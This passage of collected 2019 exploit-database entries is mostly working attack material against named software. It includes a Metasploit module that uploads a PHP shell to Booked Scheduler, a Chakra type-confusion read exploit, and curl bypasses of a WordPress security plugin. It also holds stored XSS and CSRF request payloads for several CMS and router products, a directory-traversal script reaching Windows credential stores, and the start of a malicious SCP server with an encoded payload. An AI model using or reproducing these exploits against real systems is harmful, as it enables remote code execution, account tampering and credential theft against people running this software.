After upload the php payload to the main directory, Exploit executes payload and receives shell.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Booked Scheduler v2.7.5', {}]
],
'DisclosureDate' => '01 March 2019',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to Booked', '/']),
OptString.new('USER', [true, 'User to login with', 'admin']),
OptString.new('PASS', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Check Exploit Vulnerable
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/Web/index.php")
})
if res and res.code == 200 and res.body =~ /v2.7.5/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Exploit Portion
##
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/Web/index.php"),
'vars_post' => {
"email" => datastore['USER'],
"password" => datastore['PASS'],
"captcha" => "",
"resume" => "",
"language" => "en_us",
"login" => "submit"
}
})
if res and res.code == 302
print_status("Successful redirection to admin dashboard.")
else
return res
end
get_cookie = res.get_cookies
cookie = get_cookie
##
# Login Access Control
##
control = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/dashboard.php")
})
html = control.body
if html =~ /Dashboard/
print_good("Login successfuly")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Reading CSRF Token
##
csrf = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php")
})
html = control.body
if html =~ /Look and Feel/
token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
print_status("CSRF Token = #{token}")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Loading phase of the vulnerable file
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data2 = "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\""
data2 << "\r\nContent-Type: text/html\r\n\r\n"
data2 << payload.encoded
data2 << "\n\r\n-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n"
data2 << "#{token}"
data2 << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_raw(
{
'method' => "POST",
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"),
'data' => data2,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res and res.code == 200
print_good "Payload was successfully uploaded."
else
print_error "Upload failed."
return
end
##
# Command execution and shell retrieval
##
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri, "/Web/custom-favicon.php"),
'cookie' => cookie
}, 25)
if res and res.code == 200
print_good "Payload executed successfully"
end
end
end
##
# End
##
<html>
<script>
/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi
* cve-2019-0539
* Getting Read &_^
* date 27 Feb , 2019
*/
var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;
function hex(x) {
return `0x${x.toString(16)}`
}
function bytes_to_u64(bytes) {
return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
+bytes[4]*0x100000000+bytes[5]*0x10000000000);
}
function i2f(x) {
u32[0] = x % BASE;
u32[1] = (x - (x % BASE)) / BASE;
return f64[0];
}
function f2i(x) {
f64[0] = x;
return u32[0] + BASE * u32[1];
}
obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90;
obj.i = 0x90;
t = new ArrayBuffer(0x200);
newL = 0x1000;
hax = new ArrayBuffer(0x2000);
read_me = 0;
function hit_to_read(t){
obj.h = hax; // set ta->buffer to hax
obj.i = newL; // update target's length
read_me = new Float64Array(t);
return read_me;
}
function read(r,read_me)
{
read_me[7] = i2f(r); // setup hax->buffer
//hax = new ArrayBuffer(0x1000);
return hex(f2i(read_me[7]))
}
function cout(f){return document.write(f);}
function opt(o, c, value) {
o.c = 1
//o.a = "HELLO"
// o.b = 3;
//o.e = 1
class A extends c {
}
o.a = value // will overwrite rcx , rdx , rax
//o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
//o.b = 0x42424242
o.c = 555555
// o.d = 4
}
function pwn() {
for (let i = 0; i < 0x1000; i++) {
let o = {a: 1, b: 2,c:3};
opt(o, (function () {}), {});
}
let o = {a: 2222, b: 2,c:4,d:5};
let cons = function () {};
cons.prototype = o;
/* line 120
auxSlots *p
__Vfptr | type | 0x00000001234 | 0x0
*/
opt(o, cons, obj);
o.f = t
read_me = hit_to_read(t);
cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
vtable = hex(f2i(read_me[0]));
buffer_addr = f2i(read_me[7]);
Chakrabase = hex(vtable - 0x59a3c0)
cout("<br>")
cout("[+] ChakraBase : " + Chakrabase)
cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))
ThreadContext = read(Chakrabase - 0xffec5448,read_me)
Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
cout("<br>")
cout("[+] ThreadContext : " + ThreadContext)
cout("<br>")
cout("[+] Ntdl : " + Ntdll)
}
pwn();
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
</script></html>
# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
U can bypass user enumeration protection if u use Post method instead of Get.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
U can bypass admin scripts protection if u add one or more slashes to the uri.
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
U can bypass this protection if u encode any character in the uri.
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
#4: Hide login URL bypass:
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
curl -I http://localhost/wp-%61dmin/
#5: Stop user enumeration via REST API bypass:
U can bypass if u insert /index.php/ between domain and rest route.
curl http:/localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same above.
curl http:/localhost/index.php/wp-json/wp/v2/
--ed0x21son
# Exploit Title: Craft CMS 3.1.12 Pro - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://craftcms.com/
# Software Link : https://github.com/craftcms/cms
# Software : Craft CMS 3.1.12 Pro
# Version : 3.1.12 Pro
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9554
# In the 3.1.12 Pro version of the Craft CMS web application, the XSS vulnerability has been discovered
# in the header insertion field when adding source code.
# HTTP POST Request :
POST /XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test
Content-Type: application/x-www-form-urlencoded
Content-Length: 1936
DNT: 1
Connection: close
Cookie: CraftSessionId=2ea7nf0jqr0dtl3ioesmlpibfn; CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D
Upgrade-Insecure-Requests: 1
CRAFT_CSRF_TOKEN=dgLN-H1XWhJgLIiYSYl52Z4wVJZttVH_wDyF9k5Bi00GXCSSTri7oLF9innUOlavPu4AhcUUuEoHMpGSl7-GbdK9oBrDQT5p3BN2frKMuzd6IgTMdbWhgSXqx6pj4hV1UyLi8rZBnAqaMQT1eP_1_4X0fqZYp5Q4GfmlV7iq26NdVxnY_X03CauMkmElBmRoa-6A_U8FGYjg2ipWdesOvZa18UZsUHMNWUWBmYzHJc-82MSRtiZ19DS1iTzV74nlnSaY3vva5oBQFEDtnwZhqR93usAkM2wlEFbw_yzZTonsaW3sHPlkkZl5x8YbLvl7TDl3pXmB3e3NG75Ltl9hzQ6NM7D2dtl7MwepoPSO41vqj8Es8nQOUOgkEh-BtdgOTRJg_0TTlOJHifTOB4EhFmNAgJeHdao6olhxgkCmkcmyhATeP8LED0mL_G7C25eWMw5cms0oWHudxvcyEjFdDiaSsYFrN3is0ekOYx_TbO7E2roXNjkDZy0M5q_Kn3KdkrODw-QVIJJ3-adtsKLAka9fzIyz68joE1oIoc5NFdg%3D&action=entries%2Fsave-entry&redirect=ac40ade69b3fe7bc96c8157907aae4128d2b64f411148be4af2141edea85b42fentries%2Fnews§ionId=2&entryId=258&title=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BfeaturedEntry%5D=&fields%5BfeaturedImage%5D=&fields%5BshortDescription%5D=%3Cp%3ECraft+CMS+3.1.12+Pro+-+XSS+TEST%3C%2Fp%3E&fields%5Bheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5Bsubheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BarticleBody%5D=&fields%5BarticleBody%5D%5B259%5D%5Btype%5D=text&fields%5BarticleBody%5D%5B259%5D%5Benabled%5D=1&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Btext%5D=%3Cfigure%3E%3Ca+href%3D%22%22%3E%3Cimg+src%3D%22https%3A%2F%2Fdemo.craftcms.com%2F3Rdj0OGqru%2Fs%2Fassets%2Fsite%2F-.png%23asset%3A257%3Aurl%22+alt%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+title%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+data-image%3D%228ilh6edpse56%22%3E%3C%2Fa%3E%3Cfigcaption%3E%22%26gt%3B%3C%2Ffigcaption%3E%3C%2Ffigure%3E&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Bposition%5D=left&typeId=2&slug=craft-cms-3-1-12-pro-xss-test&author=&author%5B%5D=1&postDate%5Bdate%5D=3%2F4%2F2019&postDate%5Btimezone%5D=UTC&postDate%5Btime%5D=8%3A55+AM&postDate%5Btimezone%5D=UTC&expiryDate%5Bdate%5D=&expiryDate%5Btimezone%5D=UTC&expiryDate%5Btime%5D=&expiryDate%5Btimezone%5D=UTC&enabled=1&revisionNotes=
# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage: http://www.fiberhomegroup.com/en/
# Version: RP2669
# Tested on: Windows 10
# CVE : CVE-2019-9556
Description:
===========================================================================
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
Proof of concept :
===========================================================================
1. Login with credential 192.168.1.1
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>
POST /goform/setUser HTTP/1.1
Host: 192.168.1.1
Content-Length: 101
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/management/account_admin.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new
# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://bolt.cm/
# Software Link : https://github.com/bolt/bolt
# Software : Bolt CMS - v 3.6.4
# Version : v 3.6.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9553
# The XSS vulnerability has been discovered in the Bolt CMS web application software due to its vulnerability in the source code in version 3.6.4.
# HTTP POST Request :
POST /bolt/editcontent/pages HTTP/1.1
Host: bolt-up3x24.bolt.dockerfly.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 562
DNT: 1
Connection: close
Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb
Upgrade-Insecure-Requests: 1
content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
#!/usr/bin/env python
'''
# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
# Date: 02/11/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://marcom.com/
# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe
# Version: < 10.0 (version tested was 9.3)
# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler)
# Tested on: Windows
# CVE : 2019-7751
Summary
A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution.
Attack Details
Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. <http://><host.domain.tld>:<port#>/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080.
Vendor Response
The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". It is possible that these versions are also susceptible to the issue as well based on the response from the vendor.
Resolution
Thankfully I found some better solutions other than "just delete it".
Open services.msc
Look for the service named FusionPro Internet Request Handler
Right-click and open the properties Window
Stop the service if it's running
Select disabled startup type
Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets.
The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version .
'''
#######################
# PoC by: 0v3rride #
# DoC: February 2019 #
#######################
from requests import *
from sys import *;
def travel(fullurl):
r = get(fullurl);
print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl))
print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code));
print("-" * 80 + "\n[i]: Response Headers:\n");
for hdr in r.headers:
print("{}: {}".format(hdr, r.headers[hdr]));
print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text));
if len(argv) < 3:
print("[i]: Usage -- ./poc <http(s)://FQDN or http(s)://<IP address>:<Port #> <file to query on the local machine that is affected (e.g. /windows/system32/drivers/etc/hosts)");
print("[i]: Path needs to start with a '/'.");
else:
try:
print("[i]: https://github.com/0v3rride/");
print("-" * 80 + "\n[!] Sending the request...");
travel(argv[1] + argv[2]);
except RequestException as re:
print(re.strerror);
finally:
print("-" * 80 + "\n[!] Done!");
##################################################################################################################################
# Exploit Title: OrientDB 3.0.17 GA Community Edition (March 7th, 2019) | Multiple Vulnerabilities
# Date: 07.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://orientdb.org
# Software Link: https://orientdb.org/download
# Version: 3.0.17 GA Community Edition (March 7th, 2019)
##################################################################################################################################
Introduction
OrientDB is the world’s fastest graph database. Period. An independent
benchmark study by IBM and the Tokyo Institute of Technology showed that
OrientDB is 10x faster than Neo4j on graph operations among all the
workloads. Drive competitive advantage and accelerate innovation with new
revenue streams.
#################################################################################
Vulnerabilities: CSRF | XSS Reflected & Stored
#################################################################################
CSRF details:
#################################################################################
CSRF1
Create Database
POST /database/testdb/plocal/graph HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
Authorization: Basic cm9vdDpyb290
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=-
Content-Length: 0
#################################################################################
CSRF2
Delete Database
DELETE /database/testdb HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
Authorization: Basic cm9vdDpyb290
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=-
#################################################################################
CSRF3
Schema Manage New Vertex
POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
content-type: text/plain
X-Requested-With: XMLHttpRequest
Content-Length: 33
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
CREATE CLASS `test` extends `V`
#################################################################################
CSRF4
Schema Manage Delete Vertex
POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
content-type: text/plain
X-Requested-With: XMLHttpRequest
Content-Length: 17
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
DROP CLASS `test`
#################################################################################
CSRF5
Add User
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 108
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test","password":"test","roles":[],"status":"ACTIVE"}
#################################################################################
CSRF6
Delete User
DELETE /document/demodb/5:3 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
#################################################################################
CSRF7
Functions Management New
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 141
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test","language":"javascript","code":null,"parameters":["test"]}
#################################################################################
CSRF8
Functions Management Delete
DELETE /document/demodb/6:5 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
#################################################################################
XSS details:
#################################################################################
XSS1 Stored
Add User
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 133
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test<script>alert(1)</script>","password":"test","roles":[],"status":"ACTIVE"}
PoC
XSS works on Security Manager Actions - Delete
#################################################################################
XSS2 Reflected
URL
http://192.168.2.101:2480/document/demodb/-1:-1
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(2)</script>
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 162
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test<script>alert(2)</script>","language":"javascript","code":null,"parameters":null}
PoC
XSS works on Functions Management - Save
#################################################################################
'''
Title: SSHtranger Things
Author: Mark E. Haase <mhaase@hyperiongray.com>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`
package.
The server listens on port 2222. It accepts any username and password, and it
generates a new host key every time you run it.
$ python3 sshtranger_things.py
Download a file using a vulnerable client. The local path must be a dot:
$ scp -P 2222 foo@localhost:test.txt .
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
foo@localhost's password:
test.txt 100% 32 0.7KB/s 00:00
The file you requested (e.g. test.txt) will be saved in your current directory.
If your client is vulnerable, you will have an additional file "exploit.txt"
created in your current directory.
$ cat test.txt
This is the file you requested.
$ cat exploit.txt
SSHtranger Things
The interesting code is in ScpServer.send_file().
'''
import base64
import gzip
import logging
import paramiko
import paramiko.rsakey
import socket
import threading
logging.basicConfig(level=logging.INFO)
dummy = 'This is the file you requested.\n'
payload = gzip.decompress(base64.b64decode(
b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'
b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'
b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'
